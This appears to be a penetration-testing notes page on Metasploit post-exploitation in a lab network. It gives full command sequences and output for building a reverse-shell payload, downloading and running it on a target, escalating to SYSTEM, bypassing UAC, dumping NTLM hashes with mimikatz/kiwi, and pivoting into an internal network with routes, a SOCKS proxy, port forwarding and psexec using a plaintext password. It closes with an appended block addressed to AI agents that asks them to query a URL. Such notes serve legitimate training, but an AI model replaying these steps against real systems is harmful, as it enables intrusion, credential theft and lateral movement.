# Post-Exploitation ## Meterpreter {% code overflow="wrap" %} ```bash # Create a non-staged payload $ msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.232 LPORT=443 -f exe -o met.exe # Setup listener $ sudo msfconsole -q msf6 > use exploit/multi/handler msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https msf6 > set LHOST tun0 msf6 > set LPORT 443 msf6 > run ``` {% endcode %} ```bash # Download and execute the payload on the target $ nc 192.168.241.223 4444 Microsoft Windows [Version 10.0.22000.1219] (c) Microsoft Corporation. All rights reserved. C:\Users\luiza>powershell iwr -uri http://192.168.45.232/met.exe -OutFile met.exe powershell iwr -uri http://192.168.45.232/met.exe -OutFile met.exe C:\Users\luiza>.\met.exe .\met.exe ``` {% code overflow="wrap" %} ```bash # Catch the reverse shell msf6 exploit(multi/handler) > run [*] Started HTTPS reverse handler on https://192.168.45.232:443 ... [*] Meterpreter session 1 opened (192.168.45.232:443 -> 192.168.241.223:49595) at 2025-04-24 11:08:44 +0300 meterpreter > ``` {% endcode %} ### Inactivity Check Determines user inactivity; useful for stealth. ```bash meterpreter > idletime ``` ### Privilege Escalation Attempts `SYSTEM`-level access using techniques like Named Pipe Impersonation leveraging the `SeImpersonatePrivilege` and `SeDebugPrivilege`. ``` meterpreter > getsystem ``` ### **Process Migration** Moves session to another process to maintain stealth/persistence. Migration is only possible to processes with equal or lower security levels. ```bash meterpreter > ps meterpreter > migrate ``` If no suitable existing process is available, it can start a hidden process and migrate into it. ```bash execute -H -f notepad migrate ``` ## Modules ### UAC Bypass A typical client-side attack usually provides only an unprivileged shell. However, when the target user is a `local administrator`, we can attempt to elevate the shell's integrity level by bypassing User Account Control (UAC). The process below (`5656`) is running with a **medium integrity level**, meaning administrative actions would still be blocked by UAC. {% code overflow="wrap" %} ```powershell # Identify current privilege/integrity level meterpreter > shell Process 5656 created. ... C:\Windows\system32>powershell -ep bypass PS C:\Windows\system32> Import-Module NtObjectManager PS C:\Windows\system32> Get-NtTokenIntegrityLevel Medium # Escalate privileges PS C:\Windows\system32> ^Z Background channel 1? [y/N] y meterpreter > bg [*] Backgrounding session 2... msf6 exploit(multi/handler) > search UAC ... 21 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key) ... msf6 exploit(multi/handler) > use 21 [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp msf6 exploit(windows/local/bypassuac_sdclt) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter x64/windows ITWK01\offsec @ ITWK01 192.168.45.232:443 -> 192.168.241.223:49294 (192.168.241.223) msf6 exploit(windows/local/bypassuac_sdclt) > set session 2 session => 2 msf6 exploit(windows/local/bypassuac_sdclt) > set LHOST 192.168.45.232 LHOST => 192.168.45.232 msf6 exploit(windows/local/bypassuac_sdclt) > run ... meterpreter > shell Process 7068 created. C:\Windows\system32>powershell -ep bypass PS C:\Windows\system32> Import-Module NtObjectManager PS C:\Windows\system32> Get-NtTokenIntegrityLevel High ``` {% endcode %} ### Kiwi With elevated privileges with can also load MSF's extensions, such as `kiwi`, a wrapper around `mimikatz`. The `creds_msv` extracts LM and NTLM hashes. {% code overflow="wrap" %} ```bash # Load mimikatz module meterpreter > getsystem ...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)). meterpreter > load kiwi meterpreter > creds_msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== Username Domain NTLM SHA1 -------- ------ ---- ---- luiza ITWK01 167837 offsec ITWK01 1c3bbd ``` {% endcode %} ## Pivoting **Dual-homed** machines can act as bridges between networks. ```powershell # Identify dual-homed system $ nc 192.168.241.223 4444 C:\Users\luiza>ipconfig ... Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::8a:de6d:6427:dabb%11 IPv4 Address. . . . . . . . . . . : 192.168.241.223 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.241.254 Ethernet adapter Ethernet1: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::6fa3:81f6:4ac1:1504%14 IPv4 Address. . . . . . . . . . . : 172.16.196.199 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : ``` ### Route add We can **manually add a route** to the second network (`172.16.16.0/24`) through the existing session in order to enable MSF to route traffic through a compromised host. This allows Metasploit to **"see" and interact** with devices on that internal network. > *Routes in Metasploit let you scan and exploit targets behind firewalls or NAT by tunneling through a compromised host.* ```bash meterpreter > bg [*] Backgrounding session 5... msf6 exploit(multi/handler) > route add 172.16.196.0/24 5 [*] Route added msf6 exploit(multi/handler) > route print IPv4 Active Routing Table ========================= Subnet Netmask Gateway ------ ------- ------- 172.16.196.0 255.255.255.0 Session 5 [*] There are currently no IPv6 routes defined. msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.196.200 RHOSTS => 172.16.196.200 msf6 auxiliary(scanner/portscan/tcp) > set PORTS 445,3389 PORTS => 445,3389 msf6 auxiliary(scanner/portscan/tcp) > run [+] 172.16.196.200: - 172.16.196.200:445 - TCP OPEN [+] 172.16.196.200: - 172.16.196.200:3389 - TCP OPEN [*] 172.16.196.200: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` With the route added, we can now use MSF modules to compromise the second target. The `bind_tcp` payload is used because the target can’t initiate outbound traffic, but our attacking machine can connect to it instead. ```bash msf6 auxiliary(scanner/portscan/tcp) > use exploit/windows/smb/psexec ... smsf6 exploit(windows/smb/psexec) > set SMBUser luiza SMBUser => luiza msf6 exploit(windows/smb/psexec) > set SMBPass 'BoccieDearAeroMeow1!' SMBPass => BoccieDearAeroMeow1! msf6 exploit(windows/smb/psexec) > set RHOSTS 172.16.196.200 RHOSTS => 172.16.196.200 msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/bind_tcp PAYLOAD => windows/x64/meterpreter/bind_tcp msf6 exploit(windows/smb/psexec) > set LPORT 8000 LPORT => 8000 msf6 exploit(windows/smb/psexec) > run ... meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` ### Autoroute Instead of adding routes manually, the `autoroute` module automatically adds all routable subnets from the compromised host. {% code overflow="wrap" %} ```bash msf6 exploit(multi/handler) > use multi/manage/autoroute msf6 post(multi/manage/autoroute) > sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 7 meterpreter x64/windows ITWK01\luiza @ ITWK01 192.168.45.232:443 -> 192.168.241.223:50215 (192.168.241.223) msf6 post(multi/manage/autoroute) > set SESSION 7 SESSION => 7 msf6 post(multi/manage/autoroute) > run [*] Running module against ITWK01 [*] Searching for subnets to autoroute. [+] Route added to subnet 172.16.196.0/255.255.255.0 from host's routing table. [+] Route added to subnet 192.168.241.0/255.255.255.0 from host's routing table. [*] Post module execution completed ``` {% endcode %} ### Socks\_proxy With a route in place, the `socks_proxy` module sets up a **SOCKS5 proxy server** on the attacker's machine. This enables tunneling through compromised host using `proxychains`, which lets any external app (like RDP clients) act as if it’s inside the internal network. > *SOCKS proxy + proxychains = full tool access to pivoted networks.* ```bash msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1 SRVHOST => 127.0.0.1 msf6 auxiliary(server/socks_proxy) > set VERSION 5 VERSION => 5 msf6 auxiliary(server/socks_proxy) > run -j [*] Auxiliary module running as background job 0. [*] Starting the SOCKS proxy server ``` {% code overflow="wrap" %} ```bash $ tail -n1 /etc/proxychains.conf socks5 127.0.0.1 1080 $ sudo proxychains xfreerdp /v:172.16.196.200 /u:luiza /p:'BoccieDearAeroMeow1!' /smart-sizing ``` {% endcode %} ### Portfwd Instead of a SOCKS proxy, we can forwards traffic from the attacker's machine directly to the internal target. This maps an internal service to a local port, allowing direct tool access. ```bash meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.196.200 [*] Forward TCP relay created: (local) :3389 -> (remote) 172.16.196.200:3389 ``` ```bash $ sudo xfreerdp /v:127.0.0.1 /u:luiza /p:'BoccieDearAeroMeow1!' /smart-sizing ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://x7331.gitbook.io/boxes/tools/metasploit/post-exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.